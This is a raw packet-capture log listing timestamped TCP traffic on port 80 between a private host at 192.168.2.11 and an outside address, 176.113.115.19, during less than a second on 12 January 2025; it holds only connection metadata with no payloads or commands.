Jan 12, 2025 17:47:06.207530022 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.207731962 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.207741976 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.207752943 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.207758904 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.207768917 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.207779884 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.207828999 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.207828999 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.207890987 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.207932949 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.207932949 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.208226919 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.208239079 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.208251953 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.208261967 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.208272934 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.208283901 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.208311081 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.208352089 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.208355904 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.208355904 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.208395958 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.208544016 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.208555937 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.208560944 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.208566904 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.208578110 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.208592892 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.208622932 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.208622932 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.208733082 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.209306955 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.209319115 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.209328890 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.209352016 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.209364891 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.209367037 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.209374905 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.209420919 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.209420919 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.209423065 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.209566116 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.327967882 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.327987909 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.328000069 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.328010082 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.328022003 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.328032017 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.328043938 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.328049898 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.328090906 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.328102112 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.328116894 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.328116894 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.328183889 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.328449965 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.328461885 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.328473091 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.328483105 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.328494072 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.328504086 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.328504086 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.328516006 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.328526020 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.328541994 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.328541994 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.328577042 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.329015970 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.329027891 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.329097986 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.329152107 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.329164028 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.329174995 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.329186916 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.329195976 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.329207897 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.329209089 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.329231024 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.329263926 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.329263926 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.329288006 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.329301119 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.329312086 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.329323053 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.329333067 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.329339981 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.329339981 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.329344988 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.329370975 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.329536915 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.329890966 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.329988003 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.330049992 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.330060959 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.330073118 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.330084085 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.330091000 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.330095053 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.330105066 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.330143929 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.330143929 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.330174923 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.330188036 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.330198050 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.330209017 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.330223083 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.330293894 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.330353022 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.330363035 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.330391884 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.330426931 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.330830097 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.330879927 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.331027031 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.331039906 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.331051111 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.331103086 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.331103086 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.331187010 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.331198931 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.331208944 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.331222057 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.331232071 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.331243992 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.331243992 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.331243992 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.331289053 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.331289053 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.331372976 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.331383944 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.331393957 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.331404924 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.331430912 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.331430912 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.331490993 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.332134008 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.332145929 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.332180023 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.332309961 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.332326889 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.332338095 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.332349062 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.332359076 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.332370043 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.332381010 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.332386017 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.332386017 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.332391977 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.332402945 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.332413912 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.332425117 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.332437038 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.332438946 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.332438946 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.332448006 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.332480907 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.332480907 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.333058119 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.333199978 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.333210945 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.333220005 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.333223104 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.333234072 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.333246946 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.333257914 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.333266020 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.333268881 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.333312988 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.333312988 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.333333969 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.333344936 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.333355904 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.333367109 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.333376884 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.333404064 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.333404064 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.333461046 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.412846088 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.412858009 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.412868977 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.412879944 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.412914038 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.412916899 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.412928104 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.412986994 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.413036108 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.413047075 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.413058996 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.413103104 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.413103104 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.413103104 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.413103104 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.413146973 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.413247108 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.413256884 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.413266897 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.413278103 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.413305044 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.413305044 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.413337946 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.447674990 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.447719097 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.447762012 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.447777987 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.447832108 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.447863102 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.447881937 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.447900057 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.447935104 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.447943926 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.447943926 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.447990894 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.448025942 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.448039055 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.448039055 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.448059082 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.448072910 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.448093891 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.448122978 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.448138952 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.448138952 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.448174953 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.448194027 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.448227882 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.448256969 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.448262930 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.448299885 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.448324919 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.448324919 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.448333979 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.448357105 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.448368073 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.448412895 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.448412895 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.448436022 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.448482990 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.448492050 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.448525906 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.448559046 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.448566914 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.448566914 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.448592901 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.448625088 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.448627949 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.448662043 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.448667049 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.448698044 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.448698997 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.448739052 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.448739052 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.448791027 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.448827028 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.448837996 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.448862076 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.448895931 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.448908091 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.448908091 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.448930979 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.448949099 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.448966026 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.449002028 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.449007988 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.449007988 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.449040890 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.449229002 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.449265957 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.449301958 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.449307919 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.449307919 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.449335098 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.449366093 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.449385881 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.449419975 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.449426889 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.449426889 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.449455976 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.449465036 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.449490070 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.449523926 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.449527025 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.449527025 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.449558020 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.449584007 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.449593067 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.449625969 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.449636936 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.449636936 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.449659109 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.449696064 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.449702978 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.449702978 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.449866056 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.449908972 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.449908972 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.449917078 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.449969053 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.450002909 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.450005054 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.450021029 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.450057030 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.450059891 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.450089931 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.450115919 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.450124979 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.450156927 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.450165987 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.450165987 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.450191975 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.450202942 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.450223923 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.450252056 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.450257063 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.450290918 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.450298071 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.450298071 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.450325966 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.450329065 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.450359106 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.450376034 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.450396061 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.450432062 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.450434923 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.450469971 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.450473070 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.450473070 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.450501919 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.450516939 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.450541973 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.450572968 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.450612068 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.450769901 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.450815916 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.450822115 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.450856924 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.450894117 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.450906992 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.450949907 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.450953007 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.450953007 CET	49709	80	192.168.2.11	176.113.115.19
